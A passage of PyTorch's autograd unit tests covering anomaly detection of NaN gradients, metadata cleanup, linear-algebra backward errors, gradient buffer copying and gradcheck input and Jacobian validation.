with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this because diagonal_backward uses in-place
# operations and gradgradcheck does not catch whether
# they work as expected (it will succeed even if
# the gradient has requires_grad == False)
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
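# Anomaly mode should flag the NaN produced in MyFunc's backward; the warning has
# no forward-pass info when the forward ran outside detect_anomaly(), and points
# at MyFunc.apply when the forward ran inside it.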
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFunc2Backward -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still need test_anomaly_assign_parent_cleanup,
# since if the PyObject were not destroyed here, wouldn't this test detect that too?
# The answer is that the custom function's PyObject (THPFunction) actually only holds
# a weak reference to the C++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contiguous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
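# The jittered backward is not reentrant, so gradcheck should fail unless
# nondet_tol is raised enough to tolerate the mismatch.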
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn (aka has strides) and input has a dimension with stride 0 (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when inputs are mkldnn, forward mode testing is not allowed
# Tolerances are loosened below to make sure the gradients match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while computing batched grad (prints a big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
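# Mixed complex and real outputs should be handled, both for real inputs (fn) and for a complex input (fn2).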
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c,)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian of the first output wrt each input (or the given target)
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
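# get_analytical_jacobian is deprecated and no longer used internally by gradcheck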
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
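# GradcheckError subclasses RuntimeError, so both of the assertRaises checks below should pass.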
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
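# check_forward_ad=True also validates the forward-mode (JVP) Jacobian; bad_fn rescales y's
# tangent so that check must fail.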
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
